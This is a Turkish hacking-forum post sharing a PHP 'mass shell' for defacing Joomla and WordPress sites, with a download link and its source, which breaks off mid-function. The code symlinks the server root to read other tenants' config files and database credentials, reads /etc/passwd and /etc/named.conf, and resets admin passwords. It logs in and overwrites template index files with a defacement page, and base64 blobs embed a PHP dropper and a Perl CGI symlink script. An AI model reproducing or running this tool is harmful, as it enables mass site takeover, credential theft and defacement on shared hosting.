Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Joomla - Wp Mass Shell
Stallk3r
*
avatar
Albay
Durum: Çevrimdışı
Seviye Puanı: 33
Yaşam Puanı: 733 / 824
Deneyim: 97 / 100
Rep Sayısı: 420
Mesaj Sayısı: 1610
Üyelik Tarihi: 06.11.2013
     
Yorum: #1
Joomla - Wp Mass Shell
17.08.2014 20:07
Evet arkadaşlar bildiğimiz gibi genellikle herkes star.php olan sadece wordpress sitelere index atan shellimizi kullanıyoruz ama bu shell hem joomlu sitelere hemde wordpress sitelere index atıyor mass shellimiz arkadaşlar star.php %55 falan index yeme şansı olurken diğer sitelerin bunda %100 hepsi index yiyor ilk defa Burda

İNDİRME LİNKİ :http://www.dosya.tc/server34/ZUy5Rn/jowp.rar.html

İNDİRME LİNKİMİZ BUDUR ARKADAŞLAR CONFİG ÇEKTİKTEN SONRA YAPABİLİRSİN.

PHP Kod:
<?php
error_reporting
(0);
function 
entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
    
$ar0=explode($marqueurDebutLien$text);
    
$ar1=explode($marqueurFinLien$ar0[$i]);
    return 
trim($ar1[0]);
}

function 
randomt() {
    
$chars "abcdefghijkmnopqrstuvwxyz023456789";
    
srand((double)microtime()*1000000);
    
$i 0;
    
$pass '';
    while (
$i <= 7) {
        
$num rand() % 33;
        
$tmp substr($chars$num1);
        
$pass $pass $tmp;
        
$i++;
    }
    return 
$pass;
}

function 
index_changer_wp($conf$content) {
    
$output '';
    
$dol '$';
    
$go 0;
    
$username entre2v2($conf,"define('DB_USER', '","');");
    
$password entre2v2($conf,"define('DB_PASSWORD', '","');");
    
$dbname entre2v2($conf,"define('DB_NAME', '","');");
    
$prefix entre2v2($conf,$dol."table_prefix  = '","'");
    
$host entre2v2($conf,"define('DB_HOST', '","');");

    
$link=mysql_connect($host,$username,$password);
    if(
$link) {
        
mysql_select_db($dbname,$link) ;
        
$dol '$';
        
$req1 mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");
    } else {
        
$output.= "[-] DB Error<br />";
    }
    if(
$req1) {

        
$req mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
        
$data mysql_fetch_array($req);
        
$site_url=$data["option_value"]; 

        
$req mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='template'");
        
$data mysql_fetch_array($req);
        
$template $data["option_value"];

        
$req mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='current_theme'");
        
$data mysql_fetch_array($req);
        
$current_theme $data["option_value"];

        
$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
        
$url2=$site_url."/wp-login.php";

        
$ch curl_init();
        
curl_setopt($chCURLOPT_URL$url2);
        
curl_setopt($chCURLOPT_POST1);
        
curl_setopt($chCURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
        
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
        
curl_setopt($chCURLOPT_RETURNTRANSFER,1);
        
curl_setopt($chCURLOPT_HEADER0);
        
curl_setopt($chCURLOPT_CONNECTTIMEOUT10);
        
curl_setopt($chCURLOPT_USERAGENT$useragent);
        
curl_setopt($chCURLOPT_COOKIEJAR"COOKIE.txt");
        
curl_setopt($chCURLOPT_COOKIEFILE"COOKIE.txt");
        
$buffer curl_exec($ch);

        
$pos strpos($buffer,"action=logout");
        if(
$pos === false) {
$output.= "[-] Login Error<br />";
        } else {
$output.= "[+] Login Successful<br />";
$go 1;
        }
        if(
$go) {
$cond 0;
$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_FOLLOWLOCATION0);
curl_setopt($chCURLOPT_RETURNTRANSFER,1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR"COOKIE.txt");
curl_setopt($chCURLOPT_COOKIEFILE"COOKIE.txt");
$buffer0 curl_exec($ch);

$_wpnonce entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');

if(
substr_count($_file,"/index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_POST1);
curl_setopt($chCURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR"COOKIE.txt");
curl_setopt($chCURLOPT_COOKIEFILE"COOKIE.txt");
$buffer curl_exec($ch);
curl_close($ch);

$pos strpos($buffer,'<div id="message" class="updated">');
if(
$pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Updated Successfuly<br />";
$hk explode('public_html',$_file);
$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
$cond 1;
}
} else {
$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_FOLLOWLOCATION0);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR"COOKIE.txt");
curl_setopt($chCURLOPT_COOKIEFILE"COOKIE.txt");
$buffer0 curl_exec($ch);

$_wpnonce entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');

if(
substr_count($_file,"index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_POST1);
curl_setopt($chCURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR"COOKIE.txt");
curl_setopt($chCURLOPT_COOKIEFILE"COOKIE.txt");
$buffer curl_exec($ch);
curl_close($ch);

$pos strpos($buffer,'<div id="message" class="updated">');
if(
$pos === false) {
    
$output.= "[-] Updating Index.php Error<br />";
} else {
    
$output.= "[+] Index.php Template Updated Successfuly<br />";
    
$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
    
$cond 1;
}
} else {
$output.= "[-] index.php can not load in Theme Editor<br />";
}
}
        }
    } else {
        
$output.= "[-] DB Error<br />";
    }
    global 
$base_path;
    
unlink($base_path.'COOKIE.txt');
    return array(
'cond'=>$cond'output'=>$output);
}

function 
index_changer_joomla($conf$content$domain) {
    
$doler '$';
    
$username entre2v2($conf$doler."user = '""';");
    
$password entre2v2($conf$doler."password = '""';");
    
$dbname entre2v2($conf$doler."db = '""';");
    
$prefix entre2v2($conf$doler."dbprefix = '""';");
    
$host entre2v2($conf$doler."host = '","';");
    
$co=randomt();
    
$site_url "http://".$domain."/administrator";
    
$output '';
    
$cond 0
    
$link=mysql_connect($host$username$password);
    if(
$link) {
        
mysql_select_db($dbname,$link) ;
        
$req1 mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");
        
$req mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
    } else {
        
$output.= "[-] DB Error<br />";
    }
    
    if(
$req1){
        if (
$req) {
$req mysql_query("SELECT * from  `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
$data mysql_fetch_array($req);
$template_name $data["template"];

$req mysql_query("SELECT * from  `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
$data mysql_fetch_array($req);
$template_id $data["extension_id"];

$url2=$site_url."/index.php";
$ch curl_init();
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR$co); 
curl_setopt($chCURLOPT_COOKIEFILE$co); 
$buffer curl_exec($ch);
$return entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
$hidden entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);

if(
$return && $hidden) {
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_POST1);
curl_setopt($chCURLOPT_REFERER$url2);
curl_setopt($chCURLOPT_POSTFIELDS"username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR$co); 
curl_setopt($chCURLOPT_COOKIEFILE$co); 
$buffer curl_exec($ch);
$pos strpos($buffer,"com_config");
if(
$pos === false) {
$output.= "[-] Login Error<br />";
} else {
$output.= "[+] Login Successful<br />";
}
}
if(
$pos){
$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
$ch curl_init();
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR$co); 
curl_setopt($chCURLOPT_COOKIEFILE$co); 
$buffer curl_exec($ch);

$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
if(
$hidden2) {
$output.= "[+] index.php file found in Theme Editor<br />";
} else {
$output.= "[-] index.php Not found in Theme Editor<br />";
}
}
if(
$hidden2) {
$url2=$site_url."/index.php?option=com_templates&layout=edit";
$ch curl_init();
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_POST1);
curl_setopt($chCURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR$co); 
curl_setopt($chCURLOPT_COOKIEFILE$co); 
$buffer curl_exec($ch);
curl_close($ch);

$pos strpos($buffer,'<dd class="message message">');
$cond 0;
if(
$pos === false) {
$output.= "[-] Updating Index.php Error<br />";
   
} else {
$output.= "[+] Index.php Template successfully saved<br />";
$cond 1;
}
}
        } 
        else {
$req =mysql_query("SELECT * from  `".$prefix."templates_menu` WHERE client_id='0'");
$data mysql_fetch_array($req);
$template_name=$data["template"];
$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
$url2=$site_url."/index.php";
$ch curl_init();
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_CONNECTTIMEOUT10);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR$co); 
curl_setopt($chCURLOPT_COOKIEFILE$co); 
$buffer curl_exec($ch);
$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);

if(
$hidden) {
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_POST1);
curl_setopt($chCURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR$co); 
curl_setopt($chCURLOPT_COOKIEFILE$co); 
$buffer curl_exec($ch);
$pos strpos($buffer,"com_config");
if(
$pos === false) {
$output.= "[-] Login Error<br />";
} else {
$output.= "[+] Login Successful<br />";
}
}

if(
$pos) {
$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR$co); 
curl_setopt($chCURLOPT_COOKIEFILE$co); 
$buffer curl_exec($ch);
$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
if(
$hidden2) {
$output.= "[+] index.php file founded in Theme Editor<br />";
} else {
$output.= "[-] index.php Not found in Theme Editor<br />";
}
}

if(
$hidden2) {
$url2=$site_url."/index.php?option=com_templates&layout=edit";
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_POST1);
curl_setopt($chCURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR$co); 
curl_setopt($chCURLOPT_COOKIEFILE$co); 
$buffer curl_exec($ch);
curl_close($ch);

$pos strpos($buffer,'<dd class="message message fade">');
$cond 0;
if(
$pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Template successfully saved<br />";
$cond 1;
}
}
        }
    } else {
        
$output.= "[-] DB Error<br />";
    }
    global 
$base_path;
    
unlink($base_path.$co);
    return array(
'cond'=>$cond'output'=>$output); 
}

function 
exec_mode_1($def_url$hacker) {

    @
mkdir('sym',0777);
    
$wr  "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
    
$fp = @fopen ('sym/.htaccess','w');
    
fwrite($fp$wr);
    @
symlink('/','sym/root');
    
$dominios = @file_get_contents("/etc/named.conf");
    @
preg_match_all('/.*?zone "(.*?)" {/'$dominios$out);
    
$out[1] = array_unique($out[1]);
    
$numero_dominios count($out[1]);
    echo 
"Total domains: $numero_dominios <br><br />";
    
$def file_get_contents($def_url);
    
$def urlencode($def);
    
$dd 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5uZXQvZGV​mYWNlZC8yMDEzLzAxLzEzL2JhbHRzdHVkaW8ubHQvaW5kZXguaHRtbCcpOw0KJHAgPSBleHBsb2RlKCd​wdWJsaWNfaHRtbCcsZGlybmFtZShfX0ZJTEVfXykpOw0KJHAgPSAkcFswXS4ncHVibGljX2h0bWwnOw0​KaWYgKCRoYW5kbGUgPSBvcGVuZGlyKCRwKSkgew0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5​odG1sJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHA​uJy9pbmRleC5waHAnLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgJGZwMSA9IEB​mb3BlbigkcC4nL2luZGV4Lmh0bScsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICB​lY2hvICdEb25lJzsNCn0NCmNsb3NlZGlyKCRoYW5kbGUpOw0KdW5saW5rKF9fRklMRV9fKTsNCj8+';
    
$base_url 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
    
$output fopen('defaced.html''a+');
    
$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :) : 0;
    
$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :) : 0;
    echo 
'<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
    
$j 1;
    
$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
    for(
$i $st$i <= $numero_dominios$i++)
    {
        
$domain $out[1][$i];
        
$dono_arquivo = @fileowner("/etc/valiases/".$domain);
        
$infos = @posix_getpwuid($dono_arquivo);
        
        if(
$infos['name']!='root') {
$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");

$cls = ($j == 0) ? 'class="even"' 'class="odd"';
        
if(
$config01 && preg_match('/dbprefix/i',$config01)){
echo 
'<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo 
'<td align="center"><font color="pink">JOOMLA</font></td>';
$res index_changer_joomla($config01$def$domain);
echo 
'<td>'.$res['output'].'</td>';
if(
$res['cond']) {
echo 
'<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output'http://'.$domain."<br>");
$_SESSION['count1'] = $_SESSION['count1'] + 1;
} else {
echo 
'<td align="center"><span class="red">FAILED</span></td>';
}
echo 
'</tr>';
}

if(
$config02 && preg_match('/DB_NAME/i',$config02)){
echo 
'<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo 
'<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res index_changer_wp($config02$dd);
echo 
'<td>'.$res['output'].'</td>';
if(
$res['cond']) {
echo 
'<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {
echo 
'<td align="center"><span class="red">FAILED</span></td>';
}
echo 
'</tr>';
}
$cls = ($j == 0) ? 'class="even"' 'class="odd"';
if(
$config03 && preg_match('/DB_NAME/i',$config03)){
echo 
'<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo 
'<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res index_changer_wp($config03$dd);
echo 
'<td>'.$res['output'].'</td>';
if(
$res['cond']) {
echo 
'<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {    
echo 
'<td align="center"><span class="red">FAILED</span></td>';
}
echo 
'</tr>';
}
        }
    }
    echo 
'</table>';
    echo 
'<hr/>';
    echo 
'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';
    echo 
'<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
    if(
$_SESSION['count1']+$_SESSION['count2'] > 0){
        echo 
'<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}
function 
exec_mode_2($def_url) {
    
    
$domains = @file_get_contents("/etc/named.conf");
    @
preg_match_all('/.*?zone "(.*?)" {/'$domains$out);
    
$out array_unique($out[1]);
    
$num count($out);
    print(
"Total domains: $num<br><br />");
    
    
$def file_get_contents($def_url);
    
$def urlencode($def);
       
    
$output fopen('defaced.html''a+');
    
$defaced '';
    
$count1 0;
    
$count2 0;
    echo 
'<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
    
$j 1;
    
$map = array();
    foreach(
$out as $d) {
        
$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
        
$map[$info['name']] = $d;
    }
    
$dt 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcik​gPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
           NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW​1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
           h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltb​GluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
           G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5r​KCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
           YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2N​hbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
           kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQ​pmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
           B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ=='
;
    
mkdir('plsym',0777);
    
file_put_contents('plsym/plsym.cc'base64_decode($dt));
    
chmod('plsym/plsym.cc'0755);
    
$wr  "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
    
$fp = @fopen ('plsym/.htaccess','w');
    
fwrite($fp$wr);
    
fclose($fp);
    
$res file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');  
    
    
$url 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
    
unlink('plsym/plsym.cc');
    
$data file_get_contents($url);
    
preg_match_all('/<a href="(.+)">/'$data$match);
    unset(
$match[1][0]);
    
$i 1;
    foreach(
$match[1] as $m)    
    {
        
$mz explode('##',urldecode($m));
        
$config01 '';
        
$config02 '';
        if(
$mz[1] == 'joomla.txt') {
$config01 file_get_contents($url.$m);
        }
        if(
$mz[1] == 'wordpress.txt') {
$config02 file_get_contents($url.$m);
        }
        
$domain $map[$mz[0]];
        
$cls = ($j == 0) ? 'class="even"' 'class="odd"';
        
        if(
$config01 && preg_match('/dbprefix/i',$config01)){
echo 
'<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo 
'<td align="center"><font color="pink">JOOMLA</font></td>';
$res index_changer_joomla($config01$def$domain);
echo 
'<td>'.$res['output'].'</td>';
if(
$res['cond']) {
echo 
'<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output'http://'.$domain."<br>");
$count1++;
} else {
echo 
'<td align="center"><span class="red">FAILED</span></td>';
}
echo 
'</tr>';
        }

        if(
$config02 && preg_match('/DB_NAME/i',$config02)){
echo 
'<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo 
'<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res index_changer_wp($config02$def);
echo 
'<td>'.$res['output'].'</td>';
if(
$res['cond']) {
echo 
'<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output'http://'.$domain."<br>");
$count2++;
} else {
echo 
'<td align="center"><span class="red">FAILED</span></td>';
}
echo 
'</tr>';
        }
    }
    echo 
'</table>';
    echo 
'<hr/>';
    echo 
'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
    echo 
'<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
    if(
$count1+$count2 0){
        echo 
'<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}

function 
exec_mode_3($def_url) {
    
    
$domains = @file_get_contents("/etc/named.conf");
    @
preg_match_all('/.*?zone "(.*?)" {/'$domains$out);
    
$out array_unique($out[1]);
    
$num count($out);
    print(
"Total domains: $num<br><br />");
    
    
$def file_get_contents($def_url);
    
$def urlencode($def);
       
    
$output fopen('defaced.html''a+');
    
$defaced '';
    
$count1 0;
    
$count2 0;
    echo 
'<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
    
$j 1;
    
$map = array();
    foreach(
$out as $d) {
        
$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
        
$map[$info['name']] = $d;
    }
    
$dt 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcik​gPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
           kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgIC​BzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
           VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogI​CAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
           3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAg​ICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
           cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCc​pOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
           MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID​0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
           R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ=='
;
    
mkdir('plsym',0777);
    
file_put_contents('plsym/data.txt'$_POST['man_data']);
    
file_put_contents('plsym/plsym.cc'base64_decode($dt));
    
chmod('plsym/plsym.cc'0755);
    
$wr  "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
    
$fp = @fopen ('plsym/.htaccess','w');
    
fwrite($fp$wr);
    
fclose($fp);
    
$res file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');  
    
    
$url 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
    
unlink('plsym/plsym.cc');
    
$data file_get_contents($url);
    
preg_match_all('/<a href="(.+)">/'$data$match);
    unset(
$match[1][0]);
    
$i=1;
    foreach(
$match[1] as $m)    
    {
        
$mz explode('##',urldecode($m));
        
$config01 '';
        
$config02 '';
        if(
$mz[1] == 'joomla.txt') {
$config01 file_get_contents($url.$m);
        }
        if(
$mz[1] == 'wordpress.txt') {
$config02 file_get_contents($url.$m);
        }
        
$domain $map[$mz[0]];
        
$cls = ($j == 0) ? 'class="even"' 'class="odd"';
        
        if(
$config01 && preg_match('/dbprefix/i',$config01)){
echo 
'<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo 
'<td align="center"><font color="pink">JOOMLA</font></td>';
$res index_changer_joomla($config01$def$domain);
echo 
'<td>'.$res['output'].'</td>';
if(
$res['cond']) {
echo 
'<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output'http://'.$domain."<br>");
$count1++;
} else {
echo 
'<td align="center"><span class="red">FAILED</span></td>';
}
echo 
'</tr>';
        }

        if(
$config02 && preg_match('/DB_NAME/i',$config02)){
echo 
